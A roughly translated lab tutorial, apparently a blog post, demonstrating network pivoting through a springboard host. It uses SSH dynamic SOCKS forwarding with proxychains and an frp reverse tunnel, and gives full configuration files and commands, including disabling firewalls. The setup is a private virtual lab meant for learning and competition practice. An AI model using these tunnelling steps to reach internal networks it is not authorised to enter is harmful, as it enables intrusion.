1. Preparation work
Three machines are needed. Go here and prepare win7 (target host), kali (attacker), and Red Hat (springboard).
Attack aircraft (kali): 192.168.10.15
Springboard (Red Hat): 192.168.10.13
Springboard intranet (Red Hat): 192.168.11.1
Target drone (intranet win7) 192.168.11.20
Kali is an attacker on the external network, win7 is on the internal network, and Red Hat is between win7 and kali, that is, the right hand is connected to the external network (kali), and the left hand is connected to the internal network (win7).
The operation process is
1. Adjust the network. Kali can ping Red Hat, but cannot ping win7 on the intranet and Red Hat's intranet segment.
Red Hat can ping all
Win7 can ping with Red Hat. As for pinging with Kali, it stands to reason that Win7 should be able to ping Kali, but my settings don’t work.
2. Method display
Method 1 (proxychains4)
kali listens to connect to Red Hat, and then uses proxychains4 to establish an exclusive channel with win7. We access port 80 of win7 to demonstrate the results. This requires us to build a website. I use phpstudy. Let’s play around with this first.
Method 2 (frp)
It's already 2 months later, now add. There are still 3 target machines (attack machine: kali, springboard machine: kali clone, target machine: ubuntu). Let’s talk about the general idea first, and then come back to the specific demonstration.
Kali serves as the frp server, and kali clone serves as the client. The client sets its own open service port in the configuration file, and the client actively uses the server to open its own intranet (there is no need to touch it after Ubuntu has configured the network). At this time, The attack machine kali can be accessed through the tunnel built by socks5 and using proxychains connection. Windows can also access the intranet through remote ports.
2. Network configuration
This is the configuration of my vmnet1
vmnet8 settings
kali’s ip192.168.10.5
192.168.10.13 for Red Hat
and 192.168.11.1
Note that my other network card is called 37, so my network card here is ens37. Check ifconfig to see who wrote who.
This configuration file is for cp’s ens33. It turns out it doesn’t exist. You can make it yourself.
systemctl restart network
win7
Win7, go to the network adapter to configure the network
After the configuration is completed, enter ipconfig /release and ipconfig /renew in cmd
Turn off Red Hat routing forwarding
vim /proc/sys/net/ipv4/ip_forward
0 means the routing and forwarding function is not enabled.
Turn off Red Hat Firewall
setenforce 0
systemctl stop firewalld
Turn off win7 firewall
3. Start implementation
Method one (proxychains4)
Query some routes on kali, only the local 192.168.10.0 segment, I don’t know what 172.17.0.0 is, anyway, there is no 192.168.11.0 network segment
route -n
Listen on port 4444
Enter on the attack plane
ssh -CfNg -D 4444 [email protected] (the address of the springboard machine in the same network segment as the attack machine)
C means compressed data transmission
f means background user verification. This option is very useful. It can also be used by accounts that cannot log in without a shell.
N means not to execute scripts or commands
g means to allow remote hosts to connect to the forwarded port
netstat -pantu | Grip 4444
If there is a process, use kill+process ID (such as kill 60529) to kill the process.
vim /etc/proxychains4.conf or! ! ! !
because /etc/proxychains.conf
socks5 127.0.0.1 4444
Why do I use socks5? Because my competition requires it. You can use socks4.
Save and exit
proxychains4 firefox 192.168.11.20:80
Enter this command to display the 80 service of win7. The small skin I downloaded on win7, the default website I set 4 1111
success
Method 2 (frp)
You can't use apt to download frp. I can't do it anyway. I downloaded the compressed package online and installed it myself. Please refer to this blogger for details.
wget https://github.com/fatedier/frp/releases/download/v0.33.0/frp_0.33.0_linux_amd64.tar.gz
Unzip after downloading
I didn't decompress it successfully. I decompressed it graphically and then put it in.
Now let’s reorganize our network
Attacker (kali): 10.10.10.130
Springboard (kali clone): 10.10.10.128
Springboard intranet (kali clone): 192.168.10.34
Target drone (intranet ubuntu): 192.168.10.22
Between kali and kali clone is vmnet1
There is net between kali clone and ubuntu
This is more convenient. Kali can be cloned from pingkali, but ubuntu cannot be accessed.
Ubuntu and kali clones can access all targets
It’s equivalent to being opportunistic, but it meets environmental requirements.
Used on kali and kali clone
wget https://github.com/fatedier/frp/releases/download/v0.33.0/frp_0.33.0_linux_amd64.tar.gz
Download and unzip
kali (attack machine) serves as the server and modifies the configuration filefrps.ini, don’t move
This is the port that will be used to connect to the server. The default is 7000.
kali clone (springboard) as client, modifyfrpc.ini, note that it is frpc
[common]
server_addr = 10.10.10.130
server_port = 7000[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 22
remote_port = 6000#[web]
#type = http
#local_ip = 127.0.0.1
#local_port = 80
#subdomain = test.hijk.pw # web域名
#remote_port = 8082[socks5]
type=tcp
remote_port=4444
plugin=socks5[redis]
type=tcp
local_ip=127.0.0.1
local_port=6379
remote_port=6666
The following are the services I need. I will take out one separately to explain.
[ssh]
type = tcp tcp connection, not much to say
local_ip = 127.0.0.1 Mapping To the local port
local_port = 22
remote_port = 6000 If you want For remote access, you only need to access port 6000 of the server
This is a must have, this is for building tunnels
[socks5]
type=tcp
remote_port=4444
plugin=socks5
sudo mkdir -p /etc/frp
sudo cp frps.ini /etc/frp
sudo cp frps /usr/bin
sudo cp systemd/frps.service /usr/lib/systemd/system/
sudo systemctl enable frps
sudo systemctl start frps
I forgot whether I used the above. I was referring to this article at the time.
It should be used. You should use it too. Pay attention to your path. You don’t need to read his others.
Used on kali target drone
./frpc -c frpc.ini
Pay attention to your path
The yellow part is meBeforeThe configuration file redis port 6000 and ssh are written repeatedly
Then there are two ways to use kali, provided that socks5 is set up.
1. Use proxychain
On the kali attack plane
because /etc/proxychains.conf
Use in terminal
proxychains firefox 192.168.10.22:80
Attacker (kali): 10.10.10.130
Springboard (kali clone): 10.10.10.128
Springboard intranet (kali clone): 192.168.10.34
Target drone (intranet ubuntu): 192.168.10.22
Success, this is equivalent to using socks5 built by frp, and then using proxychains proxy to access the intranet, which is similar to method 1.
2. Use the remote port directly
This is the real use of frp
Prerequisite: The springboard machine, attack machine and Ubuntu all allow ssh
We use port 6000 to directly access the server
[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 22
remote_port = 6000
Use on windows: ssh [email protected] -p 6000
Attacker (kali): 10.10.10.130
Springboard (kali clone): 10.10.10.128
Springboard intranet (kali clone): 192.168.10.34
Target drone (intranet ubuntu): 192.168.10.22
At this time, I did not use ssh to log in to the springboard machine. What I wanted to express was that I used port 6000 on the server to access the springboard machine and demonstrated the function of frp.